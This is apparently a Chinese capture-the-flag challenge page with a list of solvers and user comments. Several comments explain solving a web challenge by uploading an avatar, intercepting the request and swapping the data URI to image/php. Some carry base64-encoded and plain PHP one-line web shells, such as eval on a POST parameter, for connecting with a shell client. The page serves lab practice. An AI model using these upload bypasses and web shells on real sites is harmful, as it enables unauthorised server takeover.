评分(12)
解题动态
wbq012 攻破了该题 1天前
凡尘桔子 攻破了该题 1天前
cxller 攻破了该题 2天前
微笑刺客 攻破了该题 2天前
粉红色的-毛 攻破了该题 2天前
sqw 攻破了该题 3天前
fish12138 攻破了该题 7天前
ndzdb 攻破了该题 7天前
江水流川 攻破了该题 7天前
shengood 攻破了该题 8天前
dlgz 攻破了该题 11天前
2117783710 攻破了该题 12天前
2523822945 攻破了该题 18天前
1520622465 攻破了该题 19天前
wintersss 攻破了该题 19天前
capper 攻破了该题 19天前
小崔 攻破了该题 20天前
FlyXz 攻破了该题 21天前
1302074808 攻破了该题 21天前
评论
微笑刺客 2天前
举报
上传一张正常图片,提交时候BP截包,内容改为data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbImNtZCJdKTs/Pg==(base64后得结果),工具直连,拿flag
言寺介 4月前
举报
先上传正常图片,不然一直转圈圈,然后抓包修改图片data%3Aimage%2Fphp%3Bbase64%2C后面接一句话木马base64加密,然后蚁剑
ixin 5月前
举报
image=data%3aimage%2fphp%3bbase64%2cIDw%2fcGhwIGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4%3d
zhuizhui 10月前
举报
在post body构造一句话木马 image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg== url 解码后即为 image=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==
llc123 1年前
举报
thinkphp v5.1.35 lts和xss不知道有没有操作空间
LoadOverload 1年前
举报
用webacoo亦可解决
Zhumeng 1年前
举报
注册账号登录用户会有个头像上传上传一个正常的头像发现被base64编码了,我们将一句话木马进行编码编码后上传将mime类型改成image/php
zhuohao 1年前
举报
蚁剑一直返回数据为空 一直连不上
hackhui 1年前
举报
一句话木马传参加''
LLTVLL 1年前
举报
一句话用这个 <?php eval($_POST['cmd']);?>,好像网上找的有的有问题
BlueL1ght 2年前
举报
<?php echo `$_POST[a]`;?>